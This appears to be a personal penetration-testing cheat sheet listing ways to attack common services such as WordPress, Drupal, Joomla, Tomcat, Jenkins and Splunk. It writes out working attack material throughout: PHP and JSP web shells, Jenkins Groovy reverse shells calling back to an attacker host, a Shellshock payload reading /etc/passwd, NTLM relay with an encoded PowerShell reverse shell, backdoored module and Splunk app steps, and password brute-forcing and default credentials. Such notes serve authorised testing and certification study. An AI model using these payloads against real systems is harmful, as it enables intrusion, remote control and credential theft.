Attacking Services

The best methodology for pentesting services is to usually just search “Pentesting {service name}”

https://github.com/saisathvik1/OSCP-Cheatsheet?tab=readme-ov-file

Scroll down for services scanning

Wordpress

WPScan

Use wpscan and investigate the plugins
- wpscan --url http://{IP} --enumerate --plugins-detection aggressive --random-user-agent --api-token {token}
  - --enumerate will automatically enumerate plugins, themes, and users, but we can cut it down to something like --enumerate vp,vt,u
- Look for [!] This version is out of date
  - Can use searchsploit for these plugins or the wpscan vuln database
Can also brute force logins
- sudo wpscan --password-attack xmlrpc -t {threads_eg_20} -U {username} -P /usr/share/wordlists/rockyou.txt --url {wp_site}

Misc

xmlrpc.php
- Can be exploited in a number of ways
- https://github.com/1N3/Wordpress-XMLRPC-Brute-Force-Exploit/tree/master - password brute forcing tool
- https://github.com/rm-onata/xmlrpc-attack - general attacking tool?
If signed into the wordpress page
- Check out plugins from the inside
- Check out the Backup Migration
  - Changing this to our IP can allow us to relay authentication (if signing is disabled)
  - //{kali_ip}/test with sudo impacket-ntlmrelayx --no-http-server -smb2support -t {relay_target_IP} -c "powershell -enc {reverse_shell}"
- Try to upload a shell
  - msf’s unix/webapp/wp_admin_shell_upload will do it automatically

Github

Use gato-x to enumerate entire organizations
- https://github.com/AdnaneKhan/Gato-X
- gato-x enum --target {org_name}
  - Requires a GH_TOKEN environment variable; just add export GH_TOKEN="{token}" to shell config file
Use noseyparker to scan entire organizations for passwords
- https://github.com/praetorian-inc/noseyparker
- noseyparker scan --github-org={org_name}

Drupal

droopescan
- droopescan scan drupal -u {url}
Get version from /CHANGELOG.txt
Command execution as admin before version 8
- Enable PHP filter module and Save, allowing embedded php code to be executed
- Go to Content > Add content and create a basic page
- Add something like <?php system($_GET['cmd']);?> and set Text format to PHP code, and Save
- Should be redirected to the page, but it’ll be at something like /node/{node_number_eg_3}
Command execution as admin after version 8
- PHP filter isn’t installed by default, so get latest from https://ftp.drupal.org/files/projects/php-8.x-1.1.tar.gz
- Then go to Administrator > Reports > Available updates, and upload the tar.gz
- Then repeat steps above
Uploading backdoored module
- Some privileged users can upload modules
  - These modules are just zipped php code, so we can add a php shell
- wget --no-check-certificate https://ftp.drupal.org/files/projects/captcha-8.x-1.2.tar.gz && tar xvzf captcha-8.x-1.2.tar.gz
- Create a PHP shell with <?php system($_GET['cmd']);?>
- Create an .htaccess file (as otherwise we won’t be able to directly access the modules folder) with:

<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
</IfModule>

Add both of these files to the plugin root directory and tar cvf captcha.tar.gz captcha/
Then, go to Manage > Extend, and Install new module
Upload the backdoored module and install, and shell will be at /modules/{backdoored_module}/{php_shell_file}

Joomla

droopescan
- droopescan scan joomla -u {url}
JoomaScan
- Requires python 2.7 and some dependencies - sudo python2.7 -m pip install urllib3 certifi bs4
- python2.7 joomlascan.py -u {url}
Can get version from /README.txt, media/system/js/, administrator/manifests/files/joomla.xml, or approx at plugins/system/cache/cache.xml
sudo python3 joomla-brute.py -u {url} -w passwords.txt -usr {username}
- https://github.com/ajnik/joomla-bruteforce
default username is admin
Command execution as administrator:
- Go to /administrator
  - If “Call to a member function” error appears, go to administrator/index.php?option=com_plugins and disable “Quick Icon - PHP Version Check”
- Go to Configuration > Templates and choose one
- Click on a php page to bring up the source, and add something like system($_GET['cmd']);

Tomcat

Used for hosting Java-based frameworks (used to be for Java Server Pages (JSP) scripts)
Version in /docs/
/conf/tomcat-users.xml stores user creds and roles, try tomcat/tomcat or admin/admin
Commnand execution as administrator:
- Can upload a .war file (tomcat application) to compromise the app
- Navigate to /manager/html and upload the following file, zipped into an archive titled {app_name}.war

<%@ page import="java.util.*,java.io.*"%>
<%
//
// JSP_KIT
//
// cmd.jsp = Command Execution (unix)
//
// by: Unknown
// modified: 27/06/2003
//
%>
<HTML><BODY>
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
<%
if (request.getParameter("cmd") != null) {
        out.println("Command: " + request.getParameter("cmd") + "<BR>");
        Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
        OutputStream os = p.getOutputStream();
        InputStream in = p.getInputStream();
        DataInputStream dis = new DataInputStream(in);
        String disr = dis.readLine();
        while ( disr != null ) {
                out.println(disr); 
                disr = dis.readLine(); 
                }
        }
%>
</pre>
</BODY></HTML>

Then, after deploying, go to /{app_name}/cmd.jsp?cmd={command}
Can also just use msf’s multi/http/tomcat_mgr_upload

Tomcat Common Gateway Interface (CGI)

CGI scripts, usually written in python, bash, or perl, are used to communicate/interact with external resources (like databases)
Default directory is /cgi/ or /cgi-bin, and we can fuzz them for .cmd, .bat, .py, .perl, .sh
- If we find batch scripts, try passing additional arguments to them as so: /welcome.bat?&{command}
- Shellshock is an old CVE, but can be pretty prevalent on IoT devices
  - Explotiation takes advantage of setting an environment variable allowing command execution
  - curl -H 'User-Agent: () { :; }; echo ; echo ; /bin/cat /etc/passwd' bash -s :'' {server}/cgi-bin/access.cgi

Email

smtp-user-enum
- smtp-user-enum -M {VRFY/RCPT/EXPN} -U {username_list} -D {domain} -t {ip}
o365spray
- python3 o365spray.py --enum -U {username_list} --domain {domain}
Open relay (send emails from the server)
- nmap’s --script smtp-open-relay will check
- To send an email: swaks --from {from_email} --to {to_email} --header '{header}' --body '{body}' --server {ip}

PHP

https://github.com/ivan-sincek/php-reverse-shell/blob/master/src/reverse/php_reverse_shell.php - reverse shell (cross platform)

Jenkins

Continues integration server for development
Will often not require any authntication
Can run arbitrary commands via Apache Groovy scripts in the Script Console at /script
Linux reverse shell:

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/{kali_ip}/{kali_port};cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

Windows reverse shell:

String host="{kali_ip}";
int port={kali_port};
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();

Splunk

Will often not require authentication, or with defaults admin:changeme or admin:admin/Welcome/Welcome1
- This occurs due to Splunk automatically changing to be a free version after 60 days without payment
Many ways of command execution, like Django apps, scripted inputs (most common), and alerting scripts
Can get reverse shells from this repo
Command execution using reverse shell from above:
- Create custom splunk application (just a folder like “splunk_shell” with two subdirectories, “bin” and “default”)
- “bin” folder should contain the scripts intended to run, including Powershell 1-liner (and .bat file to run it) and python revshell
  - These can be found in the above repo, and will need to be edited if intended for unix
- Create inputs.conf in the directory root, which tells Splunk which scripts to run (run script every 10 seconds):

[script://./bin/rev.py]
disabled = 0  
interval = 10  
sourcetype = shell 

[script://.\bin\run.bat]
disabled = 0
sourcetype = shell
interval = 10

Create a tarball with the repo with tar -czvf {script_name}.tar.gz {script_directory_name}
Then, in /en-US/manager/search/apps/local go to “Install app from file” and start the nc listener
Upload the tarball and upload, and scripts will be executed Compromising deployed hosts from Splunk
If there are hosts deployed from Splunk with a Universal Forwarder installed, we can RCE them as well if we’ve fully compromised the host
To push a reverse shell to those hosts, put application in {Splunk_root_dir}/etc/deployment-apps directory on the compromised Splunk machine
- This app will need to be a powershell revshell on Windows environments since the deployment servers aren’t guaranteed to come with Python

PRTG Network Monitor

Somewhat common in internal networks for network management
Default creds of prtgadmin:prtgadmin, and versioning should be in the bottom left, with CVEs associated

osTicket

Can google search for “Helpdesk software - powered by osTicket”, common-ish app used for ticket management (like Jira)
This can be an extremely useful site for obtaining a company email
- When submitting a ticket, we may get a notification email like “Send any more details to {ticket_no}@{company}”
- Information sent to the ticket email will appear on the ticketing page, resulting in our “own” corporate email
- This email can then be used to sign up for tools like Slack, Gitlab, Mattermost, Rocket.chat, Bitbucket, etc.
Useful for obtaining IT/helpdesk domain users from submitting non-relevant tickets
Some CVEs associated as well

Gitlab

Useful for finding sensitive info, like passwords or SSH keys
/help for fingerprinting version after being logged in
- Only vuln I’d try without auth would be the critical account takeover
Attempt to self-singup at /users/sign_up

ColdFusion

Programming language and dev platorm based on Java, meant to be hooked up to databases
ColdFusion Markup Language (CFML) is the programming languaged used for web apps, but can integrate deeper (like performing SQL queries or email management)
Find version from application error messages; many CVEs exist
{cf_root_dir}/lib/password.properties has encrypted passwords in key-value pairs

IIS Servers

Some versions of Microsoft servers create short file names for files ({8_char_filename}.{3_char_extension})
The server will respond with 200s for matching parts of a filename
- This means that if a directory like /secret~1/ exists, the server will return 200s for /~s, /~se, /~sec, and so on, until we reach /~secret
  - At this point we can turn /~secret into /secret~1/ and fuzz the contents within the directory
- Same thing works for filenames, e.g. /secret~1/somefi~1.txt
  - somefile1.txt would become somefi~1.txt, and somefileextrastuffhere.txt would become somefi~2.txt
This can be done automatically with IIS-ShortName-Scanner java -jar iis_shortname_scanner.jar 0 5 http://{server}/

Miscellaneous

Many of the below have plenty of CVEs, just look em up
Nagios - default creds of nagiosadmin:PASSW0RD
Websphere - default creds of system:manager
Axis2 - built on top of Tomcat, can deploy webshell in AAR file with msf module
Elasticsearch - somewhat prevalent CVE: https://www.exploit-db.com/exploits/36337
Zabbix - has built-in functionality to execute commands
WebLogic - 190 reported CVEs
MediaWiki - Many CVEs, especially in added extensions and libraries - also worth searching for sensitive info (see External notes)
DotNetNuke - has some severe CVEs associated
vCenter - manages multiple ESXis; Nessus will not pick up on some CVEs like Apache Strust 2 RCE and CVE-2021-22005